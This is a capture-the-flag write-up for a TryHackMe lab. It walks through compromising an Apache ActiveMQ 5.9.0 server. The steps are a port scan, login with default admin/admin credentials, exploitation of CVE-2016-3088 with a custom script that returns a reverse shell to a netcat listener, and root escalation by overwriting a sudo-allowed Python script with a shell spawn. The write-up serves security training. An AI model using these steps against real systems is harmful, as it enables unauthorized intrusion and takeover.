The creator give us many hints on this room, starting with the room description,notes and flag hints.
Paul and Max use a rather unconventional way to chat. They do not seem to know
that eavesdropping is possible though…
Task 2 Enumeration & flags
Paul and Max found a way to chat at work by using a certain kind of software.
They think they outsmarted their boss, but do not seem to know that eavesdropping
is quite possible…They better be careful…
Do a TCP portscan on all ports with port number greater than 1000 and smaller
than 10000! Which TCP ports do you find to be open? (counting up)
Hint: nmap -p1001-9999 IP
What is the name of the software they use?
Hint: running on one of the ports you found in question 1
Which videogame are Paul and Max talking about?
Use a MQTT client. Note: MQTT Explorer does not work. Also only use MQTT
version 3.1 as the protocol version.
CVE for the software you found in question 2
Also, other important hint is see how TryHackMe classify this room. Go in “All Rooms”and search for this especific room. This one was classified as message broker.
First, you need choose if you want to add a domain entry in /etc/hosts or use the room IP directly on each command. For the sake of simplicity of this writeup I choose add the domain name dogcat.thm into my /etc/hosts.
echo "[Room IP] broker.thm" | sudo tee -a /etc/hosts
Let’s follow the basic hacker methodology
In this room we will use the 3 first steps from basic hacker methodology that are recon, exploitation and privilege elevation.
Phase 1: recon
Start scanning for open ports and running services.
sudo nmap -sS -sV -T4 --open -Pn -p 1000-10000 broker.thm Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-11 07:43 EST Nmap scan report for broker.thm (10.10.56.121) Host is up (0.15s latency). Not shown: 8999 closed ports PORT STATE SERVICE VERSION 1883/tcp open mqtt? 8161/tcp open http Jetty 7.6.9.v20130131 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 85.08 seconds
There are 2 open ports. Port 1883 is used for mqtt? and port 8161 for Jetty. Searching in the web, Jettty is a Java HTTP Web Server and mqtt refers to Message Queuing Telemetry Transport, some publish-subscribe network protocol.
Opening the browser on port 8161.
Clicking in “Manage ActiveMQ broker” we receive a basic authentication window.
Phase 2: exploitation
Always when you find some default page with authentication, it is valid to searchfor default passwords. In this case, I found that the defaultcredentials are username admin, password admin.
We are in the ActiveMQ admin page, the version is 5.9.0. Searching in the Exploit Database I found a Metasploit script to explore for this service and version. Apache ActiveMQ 5.x-5.11.1 – Directory Traversal Shell Upload (Metasploit), unfortunately this script does not work on this host.
Searching a little more, I found this page that describe the Analysis of Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016–3088) and explain how to explore this vulnerability.
For me this was the way, I do recommend to you to look the page and learn all the steps needed to explore this vulnerability.
But, after finishing this room I create a simple exploit to do this work automatically.
So, let’s do it.
Open a new terminal window and start a netcat service.
nc -nvlp 1234
This is the script.
python3 exploit_activemq.py Developed by @cyberaguiar - www.cyberaguiar.com ----------------------------------------------------------------------- ** Disclaimer ** ----------------------------------------------------------------------- The developer of this script are not responsible for any misuse of this exploit we only encourage the ethical use of this script and to be used only when authorised to do so during an penetration test or similar. Any damages or misuse of this script is the responsibility of the individuals who use them unethically or with the intent to damage property. ----------------------------------------------------------------------- USAGE: python exploit_activemq.py rhost rport username password lhost lport
You will need replace the local VPN IP to your one in the command below.
python3 exploit_activemq.py broker.thm 8161 admin admin 10.6.10.10 1234
Voilà, whe have shell.
Start a nice bash shell whit python3.
python3 -c "import pty;pty.spawn('/bin/bash')"; export TERM=xterm
Before continue, there is a question in the room about the game that Paul and Maxwere talking about. Maybe the room creators expect that we use a mqtt client andto the queue service to read those messages. As we go directly to the server, thiswas not needed, but, in the end of this writeup I will show how doing it.
ls -l total 9968 -rw-r--r-- 1 activemq activemq 40580 Oct 14 2013 LICENSE -rw-r--r-- 1 activemq activemq 3334 Oct 14 2013 NOTICE -rw-r--r-- 1 activemq activemq 2610 Oct 14 2013 README.txt -rwxr-xr-x 1 activemq activemq 10105484 Oct 14 2013 activemq-all-5.9.0.jar drwxr-xr-x 1 activemq activemq 4096 Dec 25 18:17 bin -rw-rw-r-- 1 activemq activemq 1443 Dec 25 17:50 chat.py drwxr-xr-x 1 activemq activemq 4096 Dec 25 18:16 conf drwxr-xr-x 1 activemq activemq 4096 Dec 26 04:45 data -rw-r--r-- 1 activemq activemq 23 Dec 25 18:16 flag.txt drwxr-xr-x 1 activemq activemq 4096 Dec 25 18:16 lib -r-x------ 1 activemq activemq 143 Dec 25 17:50 start.sh -rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 subscribe.py drwxr-sr-x 5 activemq activemq 4096 Mar 11 12:39 tmp drwxr-xr-x 1 activemq activemq 4096 Dec 25 18:17 webapps
Here is the flag.txt, also give a look at the chat.py file. Inside there are themessages from Paul and Max chatting about the some videogame.
Phase 3: privilege elevation
sudo -l Matching Defaults entries for activemq on activemq: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User activemq may run the following commands on activemq: (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
ls -lha /opt/apache-activemq-5.9.0/subscribe.py <.0$ ls -lha /opt/apache-activemq-5.9.0/subscribe.py -rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 /opt/apache-activemq-5.9.0/subscribe.py
You can execute the script above and also have write access to the file. Now let’sreplace the content of the script to make it execute bash as root.
echo "import pty;pty.spawn('/bin/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py <n/python3.7 /opt/apache-activemq-5.9.0/subscribe.py [email protected]:/# cat /root/root.txt
cat /root/root.txt ROOT_FLAG
Optional step, read the messages from ActiveMQ using a MQTT client
Download this mqtt client
git clone https://github.com/bapowell/python-mqtt-client-shell Cloning into 'python-mqtt-client-shell'... remote: Enumerating objects: 111, done. remote: Total 111 (delta 0), reused 0 (delta 0), pack-reused 111 Receiving objects: 100% (111/111), 35.95 KiB | 624.00 KiB/s, done. Resolving deltas: 100% (65/65), done.
cd python-mqtt-client-shell python3 mqtt_client_shell.py Welcome to the MQTT client shell. Type help or ? to list commands. Pressing <Enter> on an empty line will repeat the last command. Client args: client_id=paho-6315-kali, clean_session=True, protocol=4 (MQTTv3.1.1), transport=tcp Logging: on (indent=30), Recording: off, Pacing: 0 > python-mqtt-client-shell
Now execute the commands below.
protocol 3 connection host broker.thm connect subscribe #
Done, now you are connected and the messages will start rolling up.
That is it guys and girls, we done.
See ya in the next challenge.